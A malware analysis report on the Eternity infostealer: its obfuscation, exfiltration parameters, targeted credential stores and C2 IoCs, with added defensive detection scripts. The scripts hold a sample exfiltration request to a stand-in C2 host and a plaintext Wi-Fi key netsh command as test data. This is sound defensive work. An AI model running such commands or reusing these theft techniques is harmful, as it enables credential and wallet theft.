- Author: Mehardeep Singh Sawhney
- Editor: Suchita Katira
Summary
Objective
The objective of this report is to give a clear understanding of the workings of Eternity stealer by providing a basic explanation of its techniques and methods.
The Eternity Stealer
This stealer is written in C# and is capable of stealing data from various well-known applications. The stolen data can either be used on its own to compromise user accounts or in coordination with other exploits. The key impact of this stealer is the large volume of PII taken from infected users.
Basic Static Analysis
A quick strings and Portable Executable (PE) analysis of the sample yields a couple of hints. Strings such as mscoree.dll, and strings containing the word stealer, were observed. PE analysis shows a .NET signature on the executable, which indicates that this is most likely a stealer written in C#.
Further analysis shows that most of the function names are obfuscated. Looking at the Main function, there is further obfuscation and noise; however, SSD and DS are two conspicuous functions that appear to be used widely throughout the code.
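As an added example (not part of the original report), the following Python script performs the kind of string triage described above. The point a practitioner should take from it: .NET binaries keep their user strings in UTF-16LE, so an ASCII-only strings pass sees the import names (mscoree.dll) but misses the managed-code strings, and both encodings have to be scanned. The indicator list is drawn from this report (mscoree.dll, the word stealer, the Windows Vault and Credential Manager APIs it names, and netsh); the SAMPLE blob is constructed for the demonstration and is not the real malware.

```python
import re

# Indicator strings taken from this report: the CLR host DLL and the word
# "stealer" seen in the strings output, plus the Win32 credential APIs the
# report names in its credential-manager section and the netsh utility it
# says is invoked for Wi-Fi passwords.
INDICATORS = {
    "mscoree.dll": "CLR host import, i.e. a managed (.NET) executable",
    "stealer": "self-descriptive string",
    "VaultEnumerateVaults": "Windows Vault enumeration API",
    "VaultGetItem": "Windows Vault item retrieval API",
    "CredEnumerate": "Credential Manager enumeration API",
    "netsh": "network shell utility",
}

# Runs of 4 or more printable ASCII bytes.
ASCII_RE = re.compile(rb"[\x20-\x7e]{4,}")
# The same, but UTF-16LE encoded (each printable byte followed by NUL). .NET
# user strings live in the #US heap in this encoding, so an ASCII-only pass
# misses them.
UTF16_RE = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")


def extract_strings(data: bytes):
    """Return (ascii_strings, utf16_strings) found in a byte blob."""
    ascii_strings = [m.group().decode("ascii") for m in ASCII_RE.finditer(data)]
    wide_strings = [m.group().decode("utf-16le") for m in UTF16_RE.finditer(data)]
    return ascii_strings, wide_strings


def triage(data: bytes) -> dict:
    """Map each indicator found to the set of encodings it was found in."""
    ascii_strings, wide_strings = extract_strings(data)
    hits = {}
    for encoding, strings in (("ascii", ascii_strings), ("utf16", wide_strings)):
        for s in strings:
            low = s.lower()
            for indicator in INDICATORS:
                if indicator.lower() in low:
                    hits.setdefault(indicator, set()).add(encoding)
    return hits


def is_dotnet_like(hits: dict) -> bool:
    """A managed PE imports mscoree.dll by name in its import table."""
    return "mscoree.dll" in hits


# Constructed sample blob (not a real binary): ASCII import names as a PE
# import table would hold them, and UTF-16LE strings as the .NET #US heap
# would hold them.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"mscoree.dll\x00_CorExeMain\x00"
    + b"\x00" * 4
    + "VaultEnumerateVaults".encode("utf-16le") + b"\x00\x00"
    + "CredEnumerateW".encode("utf-16le") + b"\x00\x00"
    + b"Eternity Stealer build\x00"
)

if __name__ == "__main__":
    hits = triage(SAMPLE)
    print("managed executable:", is_dotnet_like(hits))
    for indicator, encodings in sorted(hits.items()):
        print(f"{indicator:22s} {','.join(sorted(encodings)):12s} {INDICATORS[indicator]}")
```

On the constructed blob, extract_strings alone never returns the Vault or Cred API names from the ASCII pass; they only surface in the UTF-16LE pass, which is why triage reports them with the encoding "utf16". Run against a real sample, read the file with open(path, "rb") and pass its contents in place of SAMPLE.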
Obfuscation
The SSD and DS functions use obfuscation to slow down analysis. SSD takes AES-encrypted arguments from the DS function and encodes them further; the obfuscated strings are Base64-encoded.
Upon deobfuscating the string, it was deduced that the threat actor constructs a link for the purpose of exfiltrating the data. The following parameters are used in the link for the communication:
| Parameter | Description |
|---|---|
| Pwds | Passwords stolen |
| Cards | Credit cards stolen |
| Wlts | Wallets stolen |
| Files | Files stolen |
| User | User information stolen |
| Comp | Computer information stolen |
| IP | IP information retrieved from a third-party API |
| Country | Country retrieved from a third-party API |
| City | City retrieved from a third-party API |
| Tag | Set to the value Default (its purpose is unclear) |
| Domains | Domain information stolen |
| AD | Active Directory information |
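The parameter set above is itself a usable network signature. The following Python script is an added example (not from the report) that scans constructed proxy-log lines for requests whose query string carries these parameter names. Generic names such as User, IP or City occur in legitimate traffic, so the script only alerts on a single hit when the name is distinctive (Pwds, Wlts, Cards) and otherwise requires several of the names to co-occur; the OVERLAP_THRESHOLD value and the .invalid/.example host names are assumptions made for the demonstration.

```python
from urllib.parse import urlsplit, parse_qs

# Query parameter names recovered from the deobfuscated exfiltration link
# (the table in this report). Compared case-insensitively below.
ETERNITY_PARAMS = {"pwds", "cards", "wlts", "files", "user", "comp", "ip",
                   "country", "city", "tag", "domains", "ad"}
# Names that rarely appear in legitimate query strings; one of these alone
# is enough to raise an alert.
DISTINCTIVE = {"pwds", "wlts", "cards"}
# Generic names (user, ip, city, ...) only count when several co-occur.
# Assumed threshold; tune it against your own traffic baseline.
OVERLAP_THRESHOLD = 4


def param_overlap(url: str) -> set:
    """Return the Eternity parameter names present in a URL's query string."""
    query = urlsplit(url).query
    names = {k.lower() for k in parse_qs(query, keep_blank_values=True)}
    return names & ETERNITY_PARAMS


def judge(url: str):
    """Return (is_alert, reason, overlap) for one URL."""
    overlap = param_overlap(url)
    distinctive = overlap & DISTINCTIVE
    if distinctive:
        return True, "distinctive parameter " + ",".join(sorted(distinctive)), overlap
    if len(overlap) >= OVERLAP_THRESHOLD:
        return True, f"{len(overlap)} parameter names overlap", overlap
    return False, "", overlap


def scan_proxy_log(lines):
    """Parse 'timestamp client method url status' lines and return alerts."""
    alerts = []
    for line in lines:
        parts = line.split()
        if len(parts) < 5:
            continue
        ts, client, method, url, status = parts[:5]
        is_alert, reason, overlap = judge(url)
        if is_alert:
            alerts.append({"ts": ts, "client": client, "url": url,
                           "reason": reason, "overlap": sorted(overlap)})
    return alerts


# Constructed proxy log lines; hosts use the reserved .invalid/.example names.
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z 10.0.0.5 GET http://c2.invalid/stealer/?Pwds=12&Cards=1&Wlts=3&Files=7&User=bob&Comp=WS01&IP=203.0.113.9&Country=XX&City=Nowhere&Tag=Default&Domains=0&AD=False 200",
    "2024-01-01T10:00:03Z 10.0.0.5 GET https://weather.example/api?City=Berlin&Country=DE&User=anon 200",
    "2024-01-01T10:00:04Z 10.0.0.7 GET http://c2.invalid/collect?user=alice&comp=LAPTOP&ip=10.0.0.7&country=XX&city=Nowhere 200",
    "2024-01-01T10:00:05Z 10.0.0.9 GET https://cdn.example/img.png 200",
]

if __name__ == "__main__":
    for alert in scan_proxy_log(SAMPLE_LOG):
        print(alert["ts"], alert["client"], alert["reason"], alert["url"])
```

The first sample line trips the distinctive-name rule, the third trips the co-occurrence rule even though its names are lower-cased and only the generic ones are present, and the weather request (three generic names) stays quiet. Request bodies are not inspected here; if the sample in your environment POSTs the data, apply param_overlap to the decoded form body instead of the URL.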
Data Stealing
After the handlers for the different types of stolen data are initialized, an array is initialized using the Create() function. This is a crucial point in the code, since Create() instantiates the data collected by the stealer and builds an array from it. This array is later consumed by the function responsible for pushing data to the C2.
Many stealer methods are present in the function, each specific to a particular application. The Eternity stealer is capable of stealing data from multiple applications, including Discord, Telegram, Google Chrome, and NordVPN.
Applications Targeted by Eternity Stealer
| Category | Applications |
|---|---|
| Credential Managers | Windows Vault, Credential Manager, KeePass, NordPass, 1Password, RoboForm |
| Gaming and Streaming Applications | Steam, Twitch, OBS |
| FTP Applications | FileZilla, WinSCP, CoreFTP, Snowflake |
| VPN Applications | NordVPN, EarthVPN, WindscripeVPN, AzireVPN |
| Messaging and Email Applications | Telegram, Discord, Pidgin, Outlook, FoxMail, MailBird, Viber, WhatsApp, Signal, Rambox |
| Wallets | Binance, Monero, BitcoinCore, DashcoinCore, LitecoinCore, Electrum, Exodus, Atomic, TonWallet, Jaxx, Coinomi, Daedalus, Zcash, Guarda, Wasabi, BitWarden |
| Browsers | Google Chrome, Firefox |
Credential Managers
The Eternity stealer has specific functions responsible for stealing credentials from credential managers. One of these functions is EnumerateCredentials().
Windows Vault
Windows Vault is a protected storage mechanism used by Windows to store passwords from browsers, system information, etc. The stealer uses built-in functions to access the credentials stored in Windows Vault; different functions, such as VaultGetItem_WIN7() and VaultGetItem_WIN8(), are used for different versions of Windows. The stealer enumerates all vaults by calling VaultEnumerateVaults().
Credential Manager
Credential Manager is another protected storage mechanism, used in relatively newer versions of Windows. It allows the user to view and manage stored credentials, such as passwords used for website authentication. Like Windows Vault, Credential Manager has its own built-in enumeration functions. One of them, CredEnumerate, is used by the stealer to enumerate the user's credential sets; since no filter is set, the function returns all credentials. The stealer also defines a ReadCredential() function to parse the returned data based on conditions.
Gaming and Streaming Applications
The Eternity stealer is capable of stealing data from various gaming and streaming applications, including Steam, Twitch, and OBS.
Steam Gaming Platform
Steam is a popular gaming platform that allows users to purchase games and a variety of in-game items through its community feature. The stealer looks for particular file extensions in the Steam directory. The ssfn files can be used to bypass Steam Guard, Steam's two-factor authentication service, provided that the attacker also has the user's credentials. It also steals files with the .vdf extension, which are game-specific files containing metadata and game-related information such as the in-game items owned by the user.
OBS
OBS is a popular screen-recording and live-streaming application. The stealer exfiltrates data such as profile and database information from the application.
FTP Applications
The Eternity stealer extracts credentials from many FTP applications, such as WinSCP, FileZilla, and CoreFTP.
WinSCP
WinSCP is an open-source FTP client. WinSCP can store credentials in an encrypted format, which the stealer is capable of decrypting.
CoreFTP
CoreFTP is a free FTP client that stores passwords in an encrypted format. The stealer has a function for decrypting the passwords.
VPN Applications
NordVPN
NordVPN is a well-known VPN service provider. The Eternity stealer decrypts and decodes the stolen credentials.
Messaging and E-Mail Applications
Telegram
Telegram is a popular messaging application. The files and data revealing sensitive Telegram information, like session details, are exfiltrated.
Outlook
Outlook is a popular e-mail and information-management application from Microsoft. The stealer decrypts various passwords gathered from Outlook by reading critical information from registry keys.
Wallets
The Eternity stealer steals data from multiple cryptocurrency wallets.
Bitcoin Core
Bitcoin Core is an open-source blockchain management system and wallet. The blockchain and wallet information is exfiltrated by accessing data from registry keys.
Electrum
Electrum is a popular cryptocurrency wallet for users well-versed in cryptocurrency. The Electrum configuration files are read and their key-value pairs are extracted.
Browsers
Different types of data from popular browsers, such as passwords, credit card details, etc., are obtained by the stealer.
Google Chrome
Various types of saved data from Chrome, including passwords, credit-card details, and AutoFill details, are compromised. The passwords are extracted by enumerating a domain user's session information, which contains the MasterKey; that key is then used to decrypt the passwords.
Firefox
The stealer is capable of stealing and decrypting the saved passwords from Firefox.
WiFi Passwords
The Eternity stealer exfiltrates Wi-Fi network passwords by executing two simple netsh commands provided by Windows.
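Because the stealer shells out to a built-in Windows utility, this step is visible in process-creation telemetry. The Python script below is an added detection example (not from the report) that rates netsh wlan profile queries by context: who the parent process is, whether the plaintext key is requested, and whether a second query follows the first from the same parent within a short window, which is the shape a scripted two-command harvest has. The report does not name the two commands, so the regular expressions assume the commonly documented wlan profile queries; the EVENTS records are constructed (fields modelled on a Sysmon process-creation event), and the parent allowlist and 30-second window are assumptions to tune per environment.

```python
import re
from datetime import datetime, timedelta

# The report says two netsh commands are run but does not name them; these
# patterns assume the commonly documented wlan profile queries.
WLAN_PROFILE_RE = re.compile(r"\bnetsh(?:\.exe)?\b.*\bwlan\s+show\s+profile", re.IGNORECASE)
KEY_CLEAR_RE = re.compile(r"\bkey\s*=\s*clear\b", re.IGNORECASE)
# Parents from which an administrator would plausibly type the command (assumed).
INTERACTIVE_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events, window=timedelta(seconds=30)):
    """Return one alert per wlan-profile netsh execution, rated by context."""
    alerts = []
    first_seen = {}  # parent pid -> timestamp of its first wlan profile query
    for ev in sorted(events, key=lambda e: e["ts"]):
        if not WLAN_PROFILE_RE.search(ev["cmdline"]):
            continue
        severity, reasons = "low", ["wlan profile enumeration"]
        if basename(ev["parent_image"]) not in INTERACTIVE_PARENTS:
            severity = "medium"
            reasons.append("non-interactive parent " + basename(ev["parent_image"]))
        if KEY_CLEAR_RE.search(ev["cmdline"]):
            severity = "high"
            reasons.append("plaintext key requested")
        prior = first_seen.get(ev["parent_pid"])
        if prior is not None and ev["ts"] - prior <= window:
            severity = "high"
            reasons.append("repeated wlan query from same parent within window")
        first_seen.setdefault(ev["parent_pid"], ev["ts"])
        alerts.append({"ts": ev["ts"].isoformat(), "user": ev["user"],
                       "parent": ev["parent_image"], "severity": severity,
                       "reasons": reasons})
    return alerts


def _ev(ts, cmdline, parent_image, parent_pid, user):
    """Build one constructed process-creation record."""
    return {"ts": datetime.fromisoformat(ts), "image": r"C:\Windows\System32\netsh.exe",
            "cmdline": cmdline, "parent_image": parent_image,
            "parent_pid": parent_pid, "user": user}


# Constructed process-creation records (fields modelled on Sysmon event 1).
EVENTS = [
    _ev("2024-01-01T10:00:00", "netsh wlan show profiles",
        r"C:\Users\bob\AppData\Local\Temp\update.exe", 4120, r"WS01\bob"),
    _ev("2024-01-01T10:00:02", 'netsh wlan show profile name="HomeNet" key=clear',
        r"C:\Users\bob\AppData\Local\Temp\update.exe", 4120, r"WS01\bob"),
    _ev("2024-01-01T10:01:00", "netsh advfirewall show allprofiles",
        r"C:\Windows\System32\cmd.exe", 900, r"WS01\admin"),
    _ev("2024-01-01T10:05:00", "netsh wlan show profiles",
        r"C:\Windows\explorer.exe", 1200, r"WS01\bob"),
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["ts"], alert["severity"], alert["parent"], "; ".join(alert["reasons"]))
```

The firewall query from cmd.exe is ignored, the listing launched from a Temp-folder executable is rated medium on parent alone, and the follow-up query with key=clear from the same parent two seconds later is rated high on two independent grounds. Feed real Sysmon or 4688 records into detect by mapping their fields onto the keys _ev produces.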
Active Directory Enumeration
The Eternity stealer enumerates Active Directory information. It uses the ManagementObject class to run a WMI query that enumerates domain information, which is used to determine whether the infected machine belongs to a domain.
File Grabber
The stealer has file-grabbing functionality. It prioritizes files with the .txt extension and categorizes them as important.
Location Details
The stealer stores information about the victim’s location, including city, country, and IP address. The data is obtained using a website and is formatted accordingly.
Network Operations
A specific URL is used to store the stolen data, which indicates the use of a C2 server. Further analysis of the Main function shows that the stealer makes web requests; the previously initialized array of stolen data is uploaded to the C2 server.
Indicators of Compromise (IoCs)
| URLs |
|---|
| http://lightnogu5owjjllyo4tj2sfos6fchnmcidlgo6c7e6fz2hgryhfhoyd.onion/stealer/ |
| http://wasabiwallet.online:7777/ |
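As an added example of putting these IoCs to use (not part of the report), the Python script below normalises the two URLs to host names and matches them against constructed DNS and proxy records. Two details matter in practice and are handled here: the clearnet IoC carries a non-standard port and a path, so matching must be on the host and not the literal URL; and matching must be exact-host-or-subdomain, never a plain substring, so a look-alike such as notwasabiwallet.online does not match. The RECORDS list and the .example host names are constructed for the demonstration.

```python
from urllib.parse import urlsplit

# IoC URLs listed in this report.
IOC_URLS = [
    "http://lightnogu5owjjllyo4tj2sfos6fchnmcidlgo6c7e6fz2hgryhfhoyd.onion/stealer/",
    "http://wasabiwallet.online:7777/",
]


def ioc_hosts(urls):
    """Normalise IoC URLs to lower-case host names (scheme, port and path dropped)."""
    return {urlsplit(u).hostname.lower() for u in urls}


def host_matches(host: str, iocs: set) -> bool:
    """Exact host match, or a subdomain of an IoC host; never a mere substring."""
    host = host.lower().rstrip(".")
    return host in iocs or any(host.endswith("." + h) for h in iocs)


def scan(records, iocs):
    """records: dicts with 'source' ('dns' or 'proxy'), 'client', and either
    'query' (dns) or 'url' (proxy). Returns the matching records plus the host hit."""
    hits = []
    for r in records:
        if r["source"] == "dns":
            host = r["query"]
        else:
            host = urlsplit(r["url"]).hostname or ""
        if host_matches(host, iocs):
            hits.append({**r, "matched_host": host.lower().rstrip(".")})
    return hits


# Constructed telemetry; .example hosts are placeholders.
RECORDS = [
    {"source": "dns", "client": "10.0.0.5", "query": "wasabiwallet.online."},
    {"source": "proxy", "client": "10.0.0.5", "url": "http://wasabiwallet.online:7777/upload"},
    {"source": "proxy", "client": "10.0.0.6", "url": "https://cdn.wasabiwallet.online/x"},
    {"source": "proxy", "client": "10.0.0.7", "url": "https://notwasabiwallet.online/"},
    {"source": "dns", "client": "10.0.0.8",
     "query": "lightnogu5owjjllyo4tj2sfos6fchnmcidlgo6c7e6fz2hgryhfhoyd.onion"},
    {"source": "proxy", "client": "10.0.0.9", "url": "https://www.example/"},
]

if __name__ == "__main__":
    for hit in scan(RECORDS, ioc_hosts(IOC_URLS)):
        print(hit["source"], hit["client"], hit["matched_host"])
```

One caveat on the .onion entry: a sample that reaches it through Tor will not expose that host name to a proxy, so the address is mainly useful for host-side string scanning of suspect binaries. If the name does show up in DNS logs, as in the constructed record for 10.0.0.8, that is itself worth a look, since .onion names are not meant to be resolved through ordinary DNS.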
References
- CredEnumerateA function (wincred.h) – Win32 apps | Microsoft Learn
- RijndaelManaged Class (System.Security.Cryptography) | Microsoft Learn